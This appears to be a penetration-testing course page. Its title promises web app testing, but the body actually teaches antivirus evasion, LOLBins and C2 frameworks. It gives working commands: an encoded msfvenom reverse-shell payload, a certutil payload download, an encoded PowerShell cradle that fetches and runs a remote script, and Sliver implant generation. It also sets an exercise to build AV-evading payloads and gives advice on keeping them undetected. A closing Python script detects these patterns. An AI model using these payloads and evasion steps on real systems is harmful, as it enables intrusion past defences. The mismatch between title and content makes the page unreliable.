Day 04 Web App Testing

Web Application Penetration Testing

Burp Suite, OWASP testing methodology, SQLMap, and the manual techniques that automated scanners miss — the skills that separate a real web pentest from a checkbox scan.

~1 hour · Intermediate · Hands-on · Precision AI Academy


01. Antivirus Evasion Techniques

Signature-based AV detects known malware patterns. Bypass techniques: encoding payloads (base64, XOR), using memory-only execution (fileless), obfuscating source code, and using legitimate system binaries (LOLBins). Tools like Veil-Framework, Shellter, and custom Python scripts generate AV-evading payloads. Always test against multiple AV engines.

02. Living Off the Land (LOLBins)

LOLBins are legitimate Windows/Linux binaries that can be abused for attacker purposes: certutil.exe downloads files, mshta.exe executes scripts, regsvr32.exe loads remote DLLs, rundll32.exe runs arbitrary code. LOLBAS (Windows) and GTFOBins (Linux) catalog all known techniques. EDR solutions now monitor these, but they remain effective against legacy defenses.

03. C2 Frameworks: Cobalt Strike and Alternatives

Command and Control (C2) frameworks manage post-exploitation sessions across many compromised hosts. Cobalt Strike is the enterprise standard (red teams). Open-source alternatives: Sliver, Havoc, and Covenant. C2 frameworks provide persistence, lateral movement, and exfiltration features unavailable in basic Metasploit sessions.

```bash
# Encode a payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=443 \
  -e x64/xor_dynamic -i 10 \
  -f exe -o payload_encoded.exe

# Test detection rate (upload to antiscan.me - no AV reporting)
# Windows LOLBin: certutil download
# certutil.exe -urlcache -f http://192.168.1.50/payload.exe payload.exe
```

```powershell
# PowerShell encoded command
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.50/shell.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
```

```bash
# Sliver C2 server setup
sliver-server
sliver> generate --mtls 192.168.1.50 --os windows --arch amd64 --save implant.exe
```
💡
Never test AV evasion on VirusTotal — it shares samples with AV vendors and will burn your techniques. Use antiscan.me or an offline test environment.
📝 Day 4 Exercise
Build an AV-Evading Payload
  1. Generate a standard Meterpreter payload and check its AV detection rate on antiscan.me
  2. Apply XOR encoding with 10 iterations and re-test detection rate
  3. Use Shellter to inject a payload into a legitimate PE binary and test again
  4. Set up a Sliver C2 server and generate an mTLS implant
  5. Compare detection rates across all three payload variants

Day 4 Summary

Challenge

Research and document 5 LOLBins techniques (3 Windows, 2 Linux). For each one, describe the binary, the abuse technique, and the detection method defenders use against it.
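As an added example (not part of the course material), here is the defender's side of the LOLBins section and the encoded-PowerShell block above: a small Python rule set that flags the abuse patterns named in this lesson in process-creation command lines and decodes `-EncodedCommand` arguments so an analyst can read what would run. The sample command lines, the 203.0.113.5 address and the rule names are constructed for this example.

```python
import base64
import re

# Constructed sample process-creation command lines (Sysmon Event ID 1 /
# Windows 4688 style). These are made up for the example, not real telemetry.
_ENCODED = base64.b64encode('Write-Host "constructed test"'.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe -urlcache -f http://203.0.113.5/p.exe p.exe",
    r"C:\Windows\System32\certutil.exe -hashfile C:\Users\alice\setup.msi SHA256",
    r"C:\Windows\System32\mshta.exe http://203.0.113.5/run.hta",
    r"C:\Windows\System32\regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
    "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENCODED,
]

# One regex per abuse pattern from the lesson; the first rule that matches flags the event.
RULES = [
    ("certutil_remote_download", r"certutil(\.exe)?\b.*-urlcache\b.*https?://"),
    ("mshta_remote_or_inline", r"mshta(\.exe)?\s+(https?://|vbscript:|javascript:)"),
    ("regsvr32_scriptlet", r"regsvr32(\.exe)?\b.*(/i:https?://|scrobj\.dll)"),
    ("rundll32_inline_script", r"rundll32(\.exe)?\b.*javascript:"),
    ("powershell_encoded_command",
     r"(powershell|pwsh)(\.exe)?\b.*\s-(encodedcommand|enc|ec|e)\s+(?P<b64>[A-Za-z0-9+/=]+)"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

def decode_encoded_command(b64: str):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text).
    Returns None when the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def flag_lolbin_events(events):
    """Return one finding per matching command line: {rule, cmdline, decoded}."""
    findings = []
    for cmdline in events:
        for name, rx in COMPILED:
            match = rx.search(cmdline)
            if match is None:
                continue
            decoded = None
            if name == "powershell_encoded_command":
                decoded = decode_encoded_command(match.group("b64"))
            findings.append({"rule": name, "cmdline": cmdline, "decoded": decoded})
            break  # one finding per event is enough for triage
    return findings
```

Running `flag_lolbin_events(SAMPLE_EVENTS)` flags four of the six lines; the benign `certutil -hashfile` and `rundll32 shell32.dll` calls pass, which is the point of matching on arguments rather than on binary names alone.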

What's Next

The foundations from today carry into Day 5, where the focus shifts to Reporting and Remediation Guidance, building on everything covered here.

Day 4 Checkpoint

Before moving on, verify you can answer these without looking:

  • What is the core concept introduced in this lesson, and why does it matter?
  • What are the two or three most common mistakes practitioners make with this topic?
  • Can you explain the key code pattern from this lesson to a colleague in plain language?
  • What would break first if you skipped the safeguards or best practices described here?
  • How does today's topic connect to what comes in Day 5?

Live Bootcamp

Learn this in person — 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.
